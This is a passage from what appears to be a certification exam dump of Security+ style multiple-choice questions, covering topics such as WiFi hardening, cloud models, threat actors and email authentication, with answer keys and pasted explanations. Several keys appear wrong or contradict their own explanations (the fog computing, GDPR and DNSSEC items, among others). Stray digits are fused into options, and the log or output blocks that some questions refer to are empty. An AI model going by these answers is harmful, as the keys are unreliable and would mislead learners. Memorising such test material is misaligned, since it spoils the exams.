E. Storing LAN manager hash values 
F. Enabling NTLM

Answer: AD

END
QUESTION 346
A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. 
After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, 
and RADIUS. Which of the following should the analyst disable to enhance the access point security?

A. WPA3 
B. AES
C. RADIUS 
D. WPS

Answer: D

END
QUESTION 347
Which of the following distributes data among nodes, making it more difficult to manipulate the data while also minimizing downtime?

A. MSSP
B. Public cloud 
C. Hybrid cloud 
D. Fog computing

Answer: C

A hybrid cloud—sometimes called a cloud hybrid—is a computing environment that combines an on-premises datacenter (also called a private cloud) with a public cloud, allowing data and applications to be shared between them.

 

Fog and Edge Computing
Most of the cloud services we have considered so far are "user-facing." They support applications that human users interact with, such as video streaming, CRM, business analytics, email and conferencing, endpoint protection analytics, and so on. However,
a very large and increasing amount of cloud data processing takes place with data generated by Internet of Things (IoT) devices and sensors. Industrial processes and even home automation are availability-focused. While confidentiality and integrity are
still important concerns, service interruption in an operational technology network can be physically dangerous. Consequently, there is a strong requirement to retrieve and analyze IoT data with low latency. A traditional data center architecture does not meet this requirement very well. Sensors are quite likely to have relatively low-bandwidth, higher latency WAN links to
data networks. Sensors may generate huge quantities of data only a selection of which needs to be prioritized for analysis. 
Fog computing, developed by Cisco (cisco.com/c/dam/en_us/solutions/trends/iot/docs/computing-overview.pdf), addresses these requirements by placing fog node processing resources close to the physical location for the IoT sensors. The sensors communicate with the fog node, using Wi-Fi, ZigBee, or 4G/5G, and the fog node prioritizes traffic, analyzes and remediates alertable conditions, and backhauls remaining data to the data center for storage and low-priority analysis.

END
QUESTION 348
A security analyst wants to verify that a client-server (non-web) application is sending encrypted
traffic. Which of the following should the analyst use?

A. openssl 
B. hping 
C. netcat
D. tcpdump

Answer: D

OpenSSL is a robust, commercial-grade, and full-featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. It is also a general-purpose cryptography library. OpenSSL is licensed under an Apache-style license, which basically means that you are free to get and use it for commercial and non-commercial purposes subject to some simple license conditions.

END
QUESTION 349
A security engineer needs to create a network segment that can be used for servers that require connections from untrusted networks. Which of the following should the engineer implement?

A. An air gap 
B. A hot site 
C. A VLAN
D. A screened subnet

Answer: D

END
QUESTION 350
A security analyst needs to find real-time data on the latest malware and IoC’s. 
Which of the following would BEST describe the solution the analyst should pursue?

A. Advisories and bulletins 
B. Threat feeds
C. Security news articles 
D. Peer-reviewed content

Answer: B

END
QUESTION 351
Which of the following would cause a Chief Information Security Officer (CISO) the MOST concern regarding newly installed Internet-accessible 4K surveillance cameras?

A. An inability to monitor 100% of every facility could expose the company to unnecessary risk. 
B. The cameras could be compromised if not patched in a timely manner.
C. Physical security at the facility may not protect the cameras from theft. 
D. Exported videos may take up excessive space on the file servers.

Answer: B

END
QUESTION 352
A financial institution would like to store its customer data in the cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds.
Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric 
B. Symmetric
C. Homomorphic
1D. Ephemeral

Answer: C

Homomorphic encryption is a form of encryption that permits users to perform computations on its encrypted data without first decrypting it. These resulting computations are left in an encrypted form which, when decrypted, result in an identical output to that produced had the operations been performed on the unencrypted data. Homomorphic encryption can be used for privacy-preserving outsourced storage and computation. This allows data to be encrypted and out-sourced to commercial cloud environments for processing, all while encrypted.

END
QUESTION 353
A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. 
Which of the following BEST describes these threat actors?

A. Semi-authorized hackers (Gray Hat)
B. State actors
C. Script kiddies
D. Advanced persistent threats

Answer: B

State actors will work at arm's length from the national government, military, or security service that sponsors and 
protects them, maintaining "plausible deniability." They are likely to pose as independent groups or even as hacktivists. 
They may wage false flag campaigns that try to implicate other states

END
QUESTION 354
Which of the following often operates in a client-server architecture to act as a service repository providing enterprise consumers access to structured threat intelligence data?

A. STIX 
B. CIRT 
C. OSINT 
D. TAXII

Answer: D

The Structured Threat Information eXpression, or STIX, is an XML structured language for expressing and sharing threat intelligence. Like TAXII, STIX is a community-driven project currently led and sponsored by the office of Cybersecurity and Communications at the United States DHS. The MITRE Corporation has also copyrighted the STIX expression language in an effort to keep it an open standard that can be leveraged by enterprises, government agencies and security vendors. 
At the time of writing, STIX is currently at Version 1.1.1. As mentioned earlier, STIX leverages TAXII as its transport mechanism such that it is delivered as part of the TAXII “payload.”

END
QUESTION 355
A security analyst is reviewing the following output from a system:











Which of the following is MOST likely being observed?

A. ARP poisoning
B. Man in the middle
C. Denial of service 
D. DNS poisoning

Answer: C

END
QUESTION 356
Which of the following would a European company interested in implementing a technical, hands-on set of security standards MOST likely choose?

A. GDPR
B. CIS controls 
C. ISO 27001 
D. ISO 37000

Answer: A

GDPR - General Data Protection Regulation - Where some types of legislation address cybersecurity due diligence, others focus in whole or in part on information security as it affects privacy or personal data. Privacy is a distinct concept from security. Privacy requires that collection and processing of personal information be both secure and fair. Fairness and the right to privacy, as enacted by regulations such as the European Union's General Data Protection Regulation (GDPR), means that personal data cannot be collected, processed, or retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose must be clearly described to the user in plain language, not legalese.

The Center for Internet Security (cisecurity.org) is a not-for-profit organization (founded partly by The SANS Institute). It publishes the well-known "The 20 CIS Controls." The CIS-RAM (Risk Assessment Method) can be used to perform an overall
evaluation of security posture (learn.cisecurity.org/cis-ram). CIS also produces benchmarks for different aspects of cybersecurity. For example, there are benchmarks for compliance with IT frameworks and compliance programs, such as PCI DSS, NIST 800-53, SOX, and ISO 27000. There are also product-focused benchmarks, such as for Windows Desktop, Windows Server, macOS, Linux, Cisco, web browsers, web servers, database and email servers, and VMware ESXi. The CIS-CAT (Configuration
Access Tool) can be used with automated vulnerability scanners to test compliance
against these benchmarks (cisecurity.org/cybersecurity-tools/cis-cat-pro/cis-cat-faq).

> ISO 37000 - 
> Governance of an organization is the next upcoming challenge for organizations. Governance of an organization helps to: 1. Reflect the identity, mission or purpose of the organization with respect to society and its stakeholders. 
> 2. Increase organizational effectiveness, sustainability, accountability and fairness. 
> 3. Fulfil the organization’s purpose. 
> 4. Avoid major incidents. 

END
QUESTION 357
A security researcher is attempting to gather data on the widespread use of a Zero-day exploit. 
Which of the following will the researcher MOST likely use to capture this data?

A. A DNS sinkhole 
B. A honeypot
C. A vulnerability scan 
D. CVSS

Answer: B

END
QUESTION 358
An engineer is setting up a VDI environment to deploy for a factory location. 
Which of the following should the engineer select to meet these requirements?

A. Laptops
B. Containers 
C. Thin clients 
D. Workstations

Answer: C

END
QUESTION 359
A security analyst is reviewing the following command-line output:








Which of the following Is the analyst observing?

A. IGMP spoofing 
B. URL redirection
C. MAC address cloning 
D. DNS poisoning

Answer: C

END
QUESTION 360
Which of the following should a data owner require all personnel to sign in order to legally protect intellectual property?

A. An NDA 
B. An AUP 
C. An ISA 
D. An MOU

Answer: A

END
QUESTION 361
A security administrator needs to inspect in-transit files on the enterprise network to search for Pll, credit card data, and classification words. Which of the following would be the BEST to use?

A. IDS solution 
B. EDR solution
C. HIPS software solution 
D. Network DLP solution

Answer: D

END
QUESTION 362
A security analyst must determine if either SSH or Telnet is being used to log in to servers. 
Which of the following should the analyst use?

A. logger
B. Metasploit 
C. tcpdump 
D. netstat

Answer: C

Metasploit Framework. Metasploit is an open source project that runs on Linux systems. It has data on over 1,600 exploits and includes methods to develop, test, and use exploit code. Rapid7 acquired Metasploit in 2009. Although the framework is still free and open source, there are more advanced editions available for purchase.

END
QUESTION 363
A security administrator is trying to determine whether a server is vulnerable to a range of attacks. 
After using a tool, the administrator obtains the following output:











Which of the following attacks was successfully implemented based on the output?

A. Memory leak
7B. Race conditions 
C. SQL injection
D. Directory traversal

Answer: D

END
QUESTION 364
An organization's finance department is implementing a policy to protect against collusion. Which of the following control types and corresponding procedures should the organization implement to fulfill this policy's requirement? (Select TWO).

A. Corrective 
B. Deterrent 
C. Preventive
D. Mandatory vacations 
E. Job rotation
F. Separation of duties

Answer: DE

If job rotation, mandatory vacations, and least privilege policies aren’t implemented, an organization may be more susceptible to fraud and collusion from employees. Chapter 11, “Implementing Policies to Mitigate Risks,” covers organizational policies.

END
QUESTION 365
A security analyst is investigating a vulnerability in which a default file permission was set incorrectly. 
The company uses non-credentialed scanning for vulnerability management. 
Which of the following tools can the analyst use to verify the permissions?

A. ssh
B. chmod 
C. ls
D. setuid 
E. nessus 
F. nc

Answer: C

https://linuxhint.com/linux_file_permissions/

Check Permissions:
Run the following command to check the permissions of all files and folders of the current directory.
$ ls –l	

END
QUESTION 366
A Chief Security Officer (CSO) is concerned about the volume and integrity of sensitive information that is exchanged between the organization and a third party through email. The CSO is particularly concerned about an unauthorized party who is intercepting information that is in transit between the two organizations. Which of the following would address the CSO's concerns?

A. SPF
B. DMARC 
C. SSL
D. DKIM 
E. TLS

Answer: E
DKIM is one of a trio of Authentication methods (SPF, DKIM and DMARC) that help prevent attackers from sending messages that look like they come from your domain.
DKIM lets you add a digital signature to outbound email messages in the message header. When you configure DKIM, you authorize your domain to associate, or sign, its name to an email message using cryptographic authentication. Email systems that get email from your domain can use this digital signature to help verify whether incoming email is legitimate.
In basic, a private key encrypts the header in a domain's outgoing email. The public key is published in the domain's DNS records, and receiving servers can use that key to decode the signature. DKIM verification helps the receiving servers confirm the mail is really coming from your domain and not someone spoofing your domain.
DMARC is an email authentication protocol. It is designed to give email domain owners the ability to protect their domain from unauthorized use, commonly known as email spoofing. The purpose and primary outcome of implementing DMARC is to protect a domain from being used in business email compromise attacks, phishing emails, email scams and other cyber threat activities.

END
QUESTION 367
Which of the following BEST describes the MFA attribute that requires a callback on a predefined landline?

A. Something you exhibit 
B. Something you can do 
C. Someone you know 
D. Somewhere you are

Answer: D

END
QUESTION 368
A multinational organization that offers web-based services has datacenters that are located only in the United States; however, a large number of its customers are in Australia, Europe, and China. Payments for services are managed by a third party in the United Kingdom that specializes in payment gateways. The management team is concerned the organization is not compliant with privacy laws that cover some of its customers. Which of the following frameworks should the management team follow?

A. Payment Card Industry Data Security Standard 
B. Cloud Security Alliance Best Practices
C. ISO/IEC 27032 Cybersecurity Guidelines 
D. General Data Protection Regulation

Answer: D

The international standard ISO/IEC 27032 is intended to emphasize the role of different securities in the Cyberspace, regarding information security, network and internet security, and critical information infrastructure protection (CIIP). ISO/IEC 27032 as an international standard provides a policy framework to address the establishment of trustworthiness, collaboration, exchange of information, and technical guidance for system integration between stakeholders in the cyberspace.

END
QUESTION 369
A company installed several crosscut shredders as part of increased information security practices targeting data leakage risks. Which of the following will this practice reduce?

A. Dumpster diving 
B. Shoulder surfing
C. Information elicitation 
D. Credential harvesting

Answer: A

END
QUESTION 370
A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to protect the PC from malicious files on the storage device?

A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access. 
C. Encrypt the disk on the storage device.
D. Plug the storage device into the UPS

Answer: A

END
QUESTION 371
Entering a secure area requires passing through two doors, both of which require someone who is already inside to initiate access. Which of the following types of physical security controls does this describe?

A. Cameras
B. Faraday cage
C. Access control vestibule 
D. Sensors
E. Guards

Answer: C

An access control vestibule (sometimes called a mantrap) prevents tailgating. It is a room, or even a building, with two doors that creates a large buffer area between the secure and unsecured areas. Access through the entry door, and the exit door is tightly controlled, either with guards or with an access card such as a proximity card. Security guards can check each person’s credentials, and they won’t be fooled by a smile as easily as Francesca might fool Homer. A simple turnstile, like those used in subways or bus stations, also prevents tailgating. Imagine two men trying to go through a turnstile like this together. It’s just not likely.

END
QUESTION 372
The lessons-learned analysis from a recent incident reveals that an administrative office worker received a call from someone claiming to be from technical support. The caller convinced the office worker to visit a website, and then download and install a program masquerading as an antivirus package. The program was actually a backdoor that an attacker could later use to remote control the worker's PC. Which of the following would be BEST to help prevent this type of attack in the future?

A. Data loss prevention 
B. Segmentation
C. Application whitelisting 
D. Quarantine

Answer: C

END
QUESTION 373
A security administrator has noticed unusual activity occurring between different global instances and workloads and needs to identify the source of the unusual traffic. Which of the following log sources would be BEST to show the source of the unusual traffic?

A. HIDS
B. UEBA 
C. CASB 
D. VPC

Answer: B

User and entity behavior analytics (UEBA) is a cybersecurity solution that uses algorithms and machine learning to detect anomalies in the behavior of not only the users in a corporate network but also the routers, servers, and endpoints in that network.
UEBA seeks to recognize any peculiar or suspicious behavior—instances where there are irregularities from normal everyday patterns or usage. For example, if a particular user on the network regularly downloads files of 20 MB every day but starts downloading 4 GB of files, the UEBA system would consider this an anomaly and either alert an IT administrator, or if automations are in place, automatically disconnect that user from the network. 
UEBA goes further than simply monitoring human behavior—it monitors machines. A server in one branch office may suddenly receive thousands more requests than usual one day, signaling the start of a potential distributed denial-of-service (DDoS) attack. There is a chance IT administrators might not notice this type of activity, but UEBA would recognize it and take further action. 

What is User Entity and Behavior Analytics (UEBA)? | Fortinet

END
QUESTION 374
A manufacturing company has, while also creating backups, several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The Operating Systems are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer (CISO) has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A. Redundancy 
B. RAID 1+5
C. Virtual machines 
D. Full backups

Answer: C

END
QUESTION 375
Which of the following terms should be included in a contract to help a company monitor the ongoing security maturity of a new vendor?

A. A right-to-audit clause allowing for annual security audits
B. Requirements for event logs to be kept for a minimum of 30 days 
C. Integration of threat intelligence in the company's AV
D. A data-breach clause requiring disclosure of significant data loss

Answer: A

What is security maturity? The term “security maturity” refers to an organization’s security position relative to its risk environment and tolerances. The risk scenarios will vary greatly according to the organizational environment, as each organization has its own security risk culture.

END
QUESTION 376
An incident, which is affecting dozens of systems, involves malware that reaches out to an Internet service for rules and updates. The IP addresses for the Internet host appear to be different in each case. The organization would like to determine a common IoC to support response and recovery actions. Which of the following sources of information would BEST support this solution?

A. Web log files 
B. Browser cache
C. DNS query logs 
D. Antivirus

Answer: C

END
QUESTION 377
Which of the following represents a biometric FRR?

A. Authorized users being denied access 
B. Users failing to enter the correct PIN
C. The denied and authorized numbers being equal
D. The number of unauthorized users being granted access

Answer: A

END
QUESTION 378
A web server administrator has redundant servers and needs to ensure failover to the secondary server when the primary server goes down. Which of the following should the administrator implement to avoid disruption?

A. NIC teaming
B. High availability
C. Dual power supply 
D. laaS

Answer: B

END
QUESTION 379
Which of the following threat actors is MOST likely to be motivated by ideology?

A. Business competitor 
B. Hacktivist
C. Criminal syndicate 
D. Script kiddie
E. Disgruntled employee

Answer: B

END
QUESTION 380
An organization regularly scans its infrastructure for missing security patches but is concerned about hackers gaining access to the scanner's account. Which of the following would be BEST to minimize this risk?

A. Require a complex, eight-character password that is updated every 90 days. 
B. Perform only non-intrusive scans of workstations.
C. Use non-credentialed scans against high-risk servers. 
D. Log and alert on unusual scanner account logon times.

Answer: A

END
QUESTION 381
The new Chief Executive Officer (CEO) of a large company has announced a partnership with a vendor that will provide multiple collaboration applications to make remote work easier. The company has a geographically dispersed staff located in numerous remote offices in different countries. The company's IT administrators are concerned about network traffic and load if all users simultaneously download the application. Which of the following would work BEST to allow each geographic region to download the software without negatively impacting the corporate network?

A. Update the host IDS rules.
B. Enable application whitelisting.
C. Modify the corporate firewall rules.
D. Deploy all applications simultaneously.

Answer: C

END
QUESTION 382
A Chief Security Officer (CSO) was notified that a customer was able to access confidential internal company files on a commonly used file-sharing service. The file-sharing service is the same one used by company staff as one of its approved third-party applications. After further investigation, the security team determines the sharing of confidential files was accidental and not malicious. However, the CSO wants to implement changes to minimize this type of incident from reoccurring but does not want to impact existing business processes. Which of the following would BEST meet the CSO's objectives?

A. DLP 
B. SWG 
C. CASB
D. Virtual network segmentation 
E. Container security

Answer: A

END
QUESTION 383
Which of the following is a reason why an organization would define an AUP?

A. To define the lowest level of privileges needed for access and use of the organization's resources
B. To define the set of rules and behaviors for users of the organization's IT systems 
C. To define the intended partnership between two organizations
D. To define the availability and reliability characteristics between an IT provider and consumer

Answer: B

END
QUESTION 384 
A security analyst needs to perform periodic vulnerably scans on production systems. 
Which of the following scan types would produce the BEST vulnerability scan report?

A. Port
B. Intrusive
C. Host discovery 
D. Credentialed

Answer: D

END
QUESTION 385
To further secure a company's email system, an administrator is adding public keys to DNS records in the company's domain. Which of the following is being used?

A. PFS 
B. SPF
C. DMARC 
D. DNSSEC

Answer: D
DMARC is an email authentication protocol. It is designed to give email domain owners the ability to protect their domain from unauthorized use, commonly known as email spoofing. The purpose and primary outcome of implementing DMARC is to protect a domain from being used in business email compromise attacks, phishing emails, email scams and other cyber threat activities.

END
QUESTION 386
A company with a large number of mobile devices is exploring enhanced security controls to manage unauthorized access if a device is lost or stolen. Specifically, if mobile devices are more than 3mi (4 8km) from the building, the management team would like to have the security team alerted and server resources restricted on those devices. Which of the following controls should the organization implement?

A. Geofencing 
B. Lockout
C. Near-field communication 
D. GPS tagging

Answer: A

END
QUESTION 387
A customer called a company's security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following:

- The manager of the accounts payable department is using the same password across multiple external websites and the corporate account.
- One of the websites the manager used recently experienced a data breach.
- The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country

Which of the following attacks has MOST likely been used to compromise the manager's corporate account?

A. Remote access Trojan 
B. Brute-force
C. Dictionary
D. Credential stuffing 
E. Password spraying

Answer: D

END
QUESTION 388
An organization has implemented a two-step verification process to protect user access to data that is stored in the cloud. 
Each employee now uses an email address or mobile number to receive a code to access the data. 
Which of the following authentication methods did the organization implement?

4A. Token key 
B. Static code
C. Push notification 
D. HOTP

Answer: D

A token key or (sometimes called a key fob or just a token) is an electronic device about the size of a remote key for a car. You can easily carry token keys in a pocket or purse or connect them to a key chain. They include a liquid crystal display (LCD) that displays a number, and this number changes periodically, such as every 60 seconds. They are sometimes called hardware tokens to differentiate them from logical or software tokens. The token is synced with a server that knows what the number is at any moment. For example, at 9:01, the number displayed on the token may be 135792, and the server knows the number is 135792. At 9:02, the displayed number changes to something else, and the server also knows the new number.

END
QUESTION 389
A company is concerned about its security after a red-team exercise. The report shows the team was able to reach the critical servers due to the SMB being exposed to the Internet.

Which of the following BEST explains the findings?

A. Default settings on the servers
B. Unsecured administrator accounts 
C. Open ports and services
D. Weak Data encryption

Answer: C

END
QUESTION 390
Which of the following would be BEST for a technician to review to determine the total risk an organization can bear when assessing a "cloud-first" adoption strategy?

A. Risk matrix
B. Risk tolerance 
C. Risk register 
D. Risk appetite

Answer: B

END
QUESTION 391
A network manager is concerned that business may be negatively impacted if the firewall in its datacenter goes offline. The manager would like to Implement a high availability pair to:

A. decrease the mean time between failures 
B. remove the single point of failure
C. cut down the mean time to repair 
D. reduce the recovery time objective

Answer: B

END
QUESTION 392
A recent security assessment revealed that an actor exploited a vulnerable workstation within an organization and has persisted on the network for several months. The organization realizes the need to reassess its security
strategy for mitigating risks within the perimeter. Which of the following solutions would BEST support the organization's strategy?

A. FIM (File Integrity Monitoring)
B. DLP 
C. EDR 
D. UTM

Answer: C

END
QUESTION 393
A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. 
Which of the following networks should the analyst monitor?

A. SFTP 
B. AS 
C. Tor 
D. IoC
‘
Answer: C

Tor is free and open-source software for enabling anonymous communication. It directs Internet traffic through a free, worldwide, volunteer overlay network, consisting of more than six thousand relays, for concealing a user's location and usage from anyone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace the Internet activity to the user. Tor's intended use is to protect the personal privacy of its users, as well as their freedom and ability to conduct confidential communications.

END
QUESTION 394
A global company is experiencing unauthorized logging due to credential theft and account lockouts caused by brute-force attacks. The company is considering implementing a third-party identity provider to help mitigate these attacks. Which of the following would be the BEST control for the company to require from prospective vendor’s?

A. IP restrictions
B. Multifactor authentication 
C. A banned password list
D. A complex password policy

Answer: B

END
QUESTION 395
An organization plans to transition the intrusion detection and prevention techniques on a critical subnet to an anomaly-based system. Which of the following does the organization need to determine for this to be successful?

A. The baseline
B. The endpoint configurations
C. The adversary behavior profiles
6D. The IPS signatures

Answer: A

END
QUESTION 396
A small business office is setting up a wireless infrastructure with primary requirements centered around protecting customer information and preventing unauthorized access to the business network. Which of the following would BEST support the office's business needs? (Select TWO)

A. Installing WAPs with strategic placement 
B. Configuring access using WPA3
C. Installing a WIDS
D. Enabling MAC filtering
E. Changing the WiFi password every 30 days
F. Reducing WiFi transmit power throughout the office

Answer: BD

END
QUESTION 397
A company just implemented a new telework policy that allows employees to use personal devices for official email and file sharing while working from home. Some of the requirements are:

- Employees must provide an alternate work location (i.e., a home address)
- Employees must install software on the device that will prevent the loss of proprietary data but will not restrict any other software from being installed.

Which of the following BEST describes the MDM options the company is using?

A. Geofencing, content management, remote wipe, containerization, and storage segmentation 
B. Content management, remote wipe, geolocation, context-aware authentication, and containerization
C. Application management, remote wipe, geofencing, context-aware authentication, and containerization
D. Remote wipe, geolocation, screen locks, storage segmentation, and full-device encryption

Answer: D

Containerization also assists content management and data loss prevention (DLP) systems. A content management system tags corporate or confidential data and prevents it from being shared or copied to unauthorized external media or channels,
such as non-corporate email systems or cloud storage services.

context-aware authentication An access control scheme that verifies an object's identity based on various environmental
factors, like time, location, and behavior.

END
QUESTION 398
A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

A. Man in the middle 
B. Evil twin
C. Jamming
D. Rogue access point 
E. Disassociation

Answer: B

END
QUESTION 399
During a security assessment, an analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst to reduce the permission for the existing users and groups and remove the set-user-ID from the file?

A. ls -l 
B. chflags 
C. chmod 
D. setuid

Answer: C

What is Setuid? (computerhope.com)
Setuid, which stands for set user ID on execution, is a special type of file permission in Unix and Unix-like operating systems such as Linux and BSD. It is a security tool that permits users to run certain programs with escalated privileges.
When an executable file's setuid permission is set, users may execute that program with a level of access that matches the user who owns the file. For instance, when a user wants to change their password, they run the passwd command. The passwd program is owned by the root account and marked as setuid, so the user is temporarily granted root access for that limited purpose.
> Viewing the setuid permission of a file.
> Setting the setuid permission of a file.
> Setgid.
> Related pages.
Viewing the setuid permission of a file
When viewing a file's permissions with the ls -l command, the setuid permission is displayed as an "s" in the "user execute" bit position. For example:
ls -l /usr/bin/passwd
-rwsr-xr-x 1 root 54192 Nov 20 17:03 /usr/bin/passwd
Setting the setuid permission of a file
To set the setuid permission for an executable file, use the permission identifier u+s with the chmod command:
chmod u+s myfile


END
QUESTION 400
A company has discovered unauthorized devices are using its WiFi network, and it wants to harden the access point to improve security. Which of the following configurations should an analyst enable to improve security? (Select Two)

A. RADIUS 
B. PEAP 
C. WPS
D. WEP-TKIP 
E. SSL
F. WPA2-PSK

Answer: AB

END
QUESTION 401
Which of the following utilize a subset of real data and are MOST likely to be used to assess the features and functions of a system and how it interacts or performs from an end user's perspective against defined test cases? (Select TWO).

A. Production 
B. Test
C. Research and development 
D. PoC
E. UAT 
F. SDLC

Answer: BE

User Acceptance Testing (UAT) is the final stage of any software development life cycle. This is when actual users test the software to see if it is able to carry out the required tasks it was designed to address in real-world situations. UAT tests adherence to customers’ requirements. UAT testers aim to validate changes that were made against original requirements.

Proof of Concept - Evidence, typically derived from an experiment or pilot project, which demonstrates that a design concept, business proposal, etc., is feasible.

END
QUESTION 402
The spread of misinformation surrounding the outbreak of a novel virus on election day led to
8eligible voters choosing not to take the risk of going to the polls. This is an example of:

A. prepending.
B. an influence campaign 
C. a watering-hole attack 
D. intimidation
E. information elicitation

Answer: B

An influence campaign is a major program launched by an adversary with a high level of capability, such as a nation-state actor, terrorist group, or hacktivist group. The goal of an influence campaign is to shift public opinion on some topic. Most high-profile
influence campaigns that have been detected target election activity, but actors may use such campaigns to pursue a number of goals.

phishing or hoax email can be made more convincing by prepending. In an offensive sense, prepending means adding text that appears to have been generated by the mail system. For example, an attacker may add "RE:" to the subject line to make it appear
as though the message is a reply or may add something like "MAILSAFE: PASSED" to make it appear as though a message has been scanned and accepted by some security software.

The classic impersonation attack is for the social engineer to phone into a department, claim they have to adjust something on the user's system remotely, and get the user to reveal their password. This specific attack is also referred to as pretexting.



END
QUESTION 403
A security engineer is installing a WAF to protect the company's website from malicious web requests over SSL. Which of the following is needed to meet the objective?

A. A reverse proxy
B. A decryption certificate 
C. A split-tunnel VPN
D. Load-balanced servers

Answer: B

END
QUESTION 404
An enterprise needs to keep cryptographic keys in a safe manner. 
Which of the following network appliances can achieve this goal?

A. HSM 
B. CASB 
C. TPM 
D. DLP

Answer: A

END
QUESTION 405
Ann, a forensic analyst, needs to prove that the data she originally acquired has remained unchanged while in her custody. Which of the following should Ann use?

A. Chain of custody 
B. Checksums
C. Non-repudiation 
D. Legal hold

Answer: B

END
QUESTION 406
The following are the logs of a successful attack.








Which of the following controls would be BEST to use to prevent such a breach in the future?

A. Password history 
B. Account expiration
C. Password complexity 
D. Account lockout

Answer: D

END
QUESTION 407 
An organization recently acquired an ISO 27001 certification. 
Which of the following would MOST likely be considered a benefit of this certification?

A. It allows for the sharing of digital forensics data across organizations 
B. It provides insurance in case of a data breach
C. It provides complimentary training and certification resources to IT security staff.
D. the organization can require It certifies work with foreign entities that have a security clearance 
E. It assures customers that the organization meets security standards

Answer: E

ISO must be purchased and is 27001 Information Security Management standard part of an overall 27000 series of information security standards, also known as 27K. Of these, 27002 classifies security controls, 27017 and 27018 reference cloud security, and 27701 focuses on personal data and privacy.

ISO 27001, “Information Security Management,” provides information on information security management system (ISMS) requirements. Organizations that implement the ISMS requirements can go through a three-stage certification process, indicating they are ISO 27001 compliant. 

> ISO 27002, “Information Technology Security Techniques,” is a complement to ISO 27001. While ISO 27001 identifies the requirements to become certified, ISO 27002 provides organizations with best practices guidance. 

> ISO 27701, “Privacy Information Management System (PIMS),” is based on ISO 27001, and it outlines a framework for managing and protecting Personally Identifiable Information (PII). It provides organizations with guidance to comply with global privacy standards, such as the European Union General Data Protection Regulation (EU GDPR). 

> ISO 31000. ISO 31000 is a family of standards related to risk management. It provides guidelines that organizations can adopt to manage risk.

END
QUESTION 408
Which of the following is the MOST secure but LEAST expensive data destruction method for data that is stored on hard drives?

A. Pulverizing 
B. Shredding 
C. Incinerating 
D. Degaussing

Answer: D

END
QUESTION 409
A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 am - 4:00 am. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts? 

A. A RAT
B. Ransomware 
C. Polymorphic 
D. A worm

Answer: C

END
QUESTION 410
A company is required to continue using legacy software to support a critical service. 
Which of the following BEST explains a risk of this practice?

A. Default system configuration 
B. Unsecure protocols
C. Lack of vendor support 
D. Weak encryption

Answer: C

END
QUESTION 411
A security researcher has alerted an organization that its sensitive user data was found for sale on a website. 
Which of the following should the organization use to inform the affected parties?

A. An incident response plan 
B. A communications plan 
C. A business continuity plan 
D. A disaster recovery plan

Answer: B

A communication plan is part of an incident response plan, and it provides direction on how to communicate issues related to an incident. As with all elements of an incident response plan, it’s important to create the communication plan before an incident. If a plan isn’t in place, the wrong people may talk to the media and give the impression that the incident is causing chaos within the organization.

END
QUESTION 412
A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy to implement?

A. Incremental backups followed by differential backups 
B. Full backups followed by incremental backups
C. Delta backups followed by differential backups 
D. Incremental backups followed by delta backups 
E. Full backups followed by differential backups

Answer: E

END
QUESTION 413
Which of the following is a risk that is specifically associated with hosting applications in the public cloud?

A. Unsecured root accounts 
B. Zero day
C. Shared tenancy 
D. Insider threat

Answer: C

END
QUESTION 414
A security analyst is reviewing a penetration-testing report from a third-party contractor. The penetration testers used the organization's new API to bypass a driver to perform privilege escalation on the organization's web servers. Upon looking at the API, the security analyst realizes the particular API call was to a legacy system running an outdated OS. Which of the following is the MOST likely attack type?

A. Request forgery 
B. Session replay 
C. DLL injection
D. Shimming

Answer: C

DLL Injection and Driver Manipulation
A dynamic link library (DLL) is a binary package that implements some sort of standard functionality, such as establishing a network connection or performing cryptography. The main process of a software application is likely to load several DLLs during the normal course of operations.

DLL injection is a vulnerability in the way the operating system allows one process to attach to another. This functionality can be abused by malware to force a legitimate process to load a malicious link library. The link library will contain whatever functions
the malware author wants to be able to run. Malware uses this technique to move from one host process to another to avoid detection. A process that has been compromised by DLL injection might open unexpected network connections, or interact with files and the registry suspiciously. To perform DLL injection the malware must already be operating with sufficient privileges, typically local administrator or system privileges. It must also evade detection by antivirus software. One means of doing this is code refactoring.

Refactoring means that the code performs the same function by using different methods (control blocks, variable types, and so on). Refactoring means that the A-V software may no longer identify the malware by its signature.

END
QUESTION 415
A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned if servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Select TWO).

A. 135 
B. 139 
C. 143 
D. 161 
E. 443 
F. 445

Answer: BF

SMB is a network file sharing protocol that requires an open port on a computer or server to communicate with other systems. SMB ports are generally port numbers 139 and445.
Port 139 is used by SMB dialects that communicate over NetBIOS. It's a transport layer protocol designed to use in Windows operating systems over a network.
Port 445 is used by newer versions of SMB (after Windows 2000) on top of a TCP stack, allowing SMB to communicate over the Internet. This also means you can use IP addresses in order to use SMB like file sharing.

END
